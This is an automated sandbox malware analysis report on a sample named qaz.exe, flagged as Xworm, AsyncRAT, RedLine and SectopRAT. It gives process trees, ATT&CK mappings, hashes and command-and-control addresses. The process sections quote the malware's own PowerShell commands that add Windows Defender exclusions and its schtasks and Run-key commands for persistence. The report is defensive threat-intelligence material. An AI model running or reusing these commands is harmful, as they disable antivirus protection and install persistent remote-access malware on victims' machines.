Malware Analysis Report

2024-09-11 08:41

Sample ID 240427-n8xecsag2w
Target qaz.exe
SHA256 01072fd48095c4819ac6f11317706a90b0e476b3028cb2b0a628834061e03514
Tags
asyncrat redline sectoprat xworm cheat default infostealer persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

01072fd48095c4819ac6f11317706a90b0e476b3028cb2b0a628834061e03514

Threat Level: Known bad

The file qaz.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat redline sectoprat xworm cheat default infostealer persistence rat trojan

SectopRAT

Xworm family

Detect Xworm Payload

SectopRAT payload

RedLine

AsyncRat

Xworm

RedLine payload

Async RAT payload

Checks computer location settings

Executes dropped EXE

Drops startup file

Adds Run key to start application

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: AddClipboardFormatListener

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-27 12:04

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-27 12:04

Reported

2024-04-27 12:07

Platform

win7-20240221-en

Max time kernel

146s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\schtasks.exe
PID 2292 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\schtasks.exe
PID 2292 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\schtasks.exe
PID 2688 wrote to memory of 1712 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1712 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1712 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2292 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\cmd.exe
PID 2292 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\cmd.exe
PID 2292 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\cmd.exe
PID 2292 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\system32\cmd.exe
PID 1264 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1264 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1264 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3016 wrote to memory of 980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3016 wrote to memory of 980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3016 wrote to memory of 980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1264 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\mstc.exe
PID 1264 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\mstc.exe
PID 1264 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\mstc.exe
PID 2688 wrote to memory of 1936 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1936 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1936 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 1476 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\schtasks.exe
PID 1476 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\schtasks.exe
PID 1476 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\schtasks.exe
PID 2688 wrote to memory of 2016 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 2016 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 2016 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\qaz.exe

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\qaz.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qaz.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {00D995CD-E7F0-4476-975D-05A42E1E33AF} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mstc" /tr '"C:\Users\Admin\AppData\Roaming\mstc.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA229.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "mstc" /tr '"C:\Users\Admin\AppData\Roaming\mstc.exe"'

C:\Users\Admin\AppData\Roaming\mstc.exe

"C:\Users\Admin\AppData\Roaming\mstc.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\mstc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
EG 41.199.23.195:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 saveclinetsforme68465454711991.publicvm.com udp
NL 91.92.254.108:7000 saveclinetsforme68465454711991.publicvm.com tcp
NL 91.92.254.108:1111 saveclinetsforme68465454711991.publicvm.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
EG 41.199.23.195:7000 tcp
NL 91.92.254.108:7000 saveclinetsforme68465454711991.publicvm.com tcp

Files

memory/2292-0-0x0000000000FE0000-0x0000000000FF2000-memory.dmp

memory/2292-1-0x000007FEF5F80000-0x000007FEF696C000-memory.dmp

memory/1072-6-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/1072-7-0x000000001B230000-0x000000001B512000-memory.dmp

memory/1072-8-0x00000000024F0000-0x00000000024F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 dda272c0f421b0139a0867a231b197fb
SHA1 7c124e587926b7cced5591b99099413ae96247ac
SHA256 ed857e2b7848c80be6e55ff323939e2d9e747bb0dbe444bcb0faa6a6741cb9e7
SHA512 9342e1318a7e3414704c6f195a5487d94aa5f74017bce08d1a6a2c181bf81ecb5cca2a09d502935ba6ef104405d8d32e7892ee6efc8baf79e86d324194d8a1c8

memory/2668-14-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/2668-15-0x0000000002220000-0x0000000002228000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2292-31-0x000000001B270000-0x000000001B2F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\explorer.exe

MD5 676a07c74e4487abada569413214be3f
SHA1 82ff0ba18b54f37b3703ea15b3414d735bd50827
SHA256 01072fd48095c4819ac6f11317706a90b0e476b3028cb2b0a628834061e03514
SHA512 71da9be9e00c19b07ea123a69fa29cc3ce08938f0e82abce58eff3e7c783e1595f1945ea2638bc010860278175694e0dc73b9de356aae1ea2f5e6c8ee1104439

memory/1712-35-0x0000000000230000-0x0000000000242000-memory.dmp

memory/2292-36-0x000007FEF5F80000-0x000007FEF696C000-memory.dmp

memory/2292-37-0x000000001B270000-0x000000001B2F0000-memory.dmp

memory/2292-39-0x0000000000BE0000-0x0000000000BFE000-memory.dmp

memory/2292-40-0x0000000000C80000-0x0000000000C96000-memory.dmp

memory/2292-41-0x000000001DAE0000-0x000000001DE30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpA229.tmp.bat

MD5 5b898445e9d32064d1ddcc8c20cce05d
SHA1 939088c77316b0e9d7ed3c421a472ccfd06129cf
SHA256 b2d01750f29648af6c928d2e94bc8380c63bf9d2e7ba5d9cac240c0fa3fba60a
SHA512 15f632c2e00aa4fd3f44b8b47219dcf2afd20594b90f6db52840ecad17284c76df64f332c528c168986f2e7c2d6d447c4d017f61030063809e0e0a359a58e583

memory/2292-52-0x000007FEF5F80000-0x000007FEF696C000-memory.dmp

memory/1476-56-0x0000000000880000-0x0000000000892000-memory.dmp

memory/1936-58-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

memory/1932-64-0x0000000001F40000-0x0000000001F48000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 201d85df0d77250f19547211c0fabc76
SHA1 366b8f7a5a909f2121e7bc0cb22d1ae6f33d1d38
SHA256 69b5155ad56c45b65fd649cd66056630be180d2c5c5e0ed556b8560ed99e24ae
SHA512 26ae7c45879f2eb12bcd8c8866171c384feaf6c518710ff0f8960ea9a5141202f6f77996154130a47968927b5d9f86753a3fe289e2b1e736709b71cba4a3a71b

memory/2100-71-0x000000001B2A0000-0x000000001B582000-memory.dmp

memory/2100-72-0x0000000002690000-0x0000000002698000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

MD5 819bee869d05421ec90c2fbe1ed03ed9
SHA1 7c52c9ff6f12c323bcf8071f7daa044a0a0cab59
SHA256 64eb99c8ab9b614a93ec32c5377123a0b0ae706e481b139e4b9b7d4f163d49d2
SHA512 6ff3f39013c6c2cf880a075c1ace5dccb8dc25fabdff37212c833a86e0e727de9e19e8d471aa0454ebce9b0d5e6b11261a14a4bf4f75eae057dcde6596ae90aa

memory/2016-90-0x0000000000380000-0x0000000000392000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-27 12:04

Reported

2024-04-27 12:05

Platform

win10v2004-20240419-en

Max time kernel

4s

Max time network

5s

Command Line

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\qaz.exe

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\qaz.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qaz.exe'

Network

Files

memory/2240-0-0x0000000000940000-0x0000000000952000-memory.dmp

memory/2240-1-0x00007FFBD4530000-0x00007FFBD4FF1000-memory.dmp

memory/4920-2-0x00007FFBD4530000-0x00007FFBD4FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdmtn1jr.3ub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4920-5-0x000001B7EFA50000-0x000001B7EFA60000-memory.dmp

memory/4920-4-0x000001B7EFA50000-0x000001B7EFA60000-memory.dmp

memory/4920-3-0x000001B7D73C0000-0x000001B7D73E2000-memory.dmp

memory/4920-17-0x00007FFBD4530000-0x00007FFBD4FF1000-memory.dmp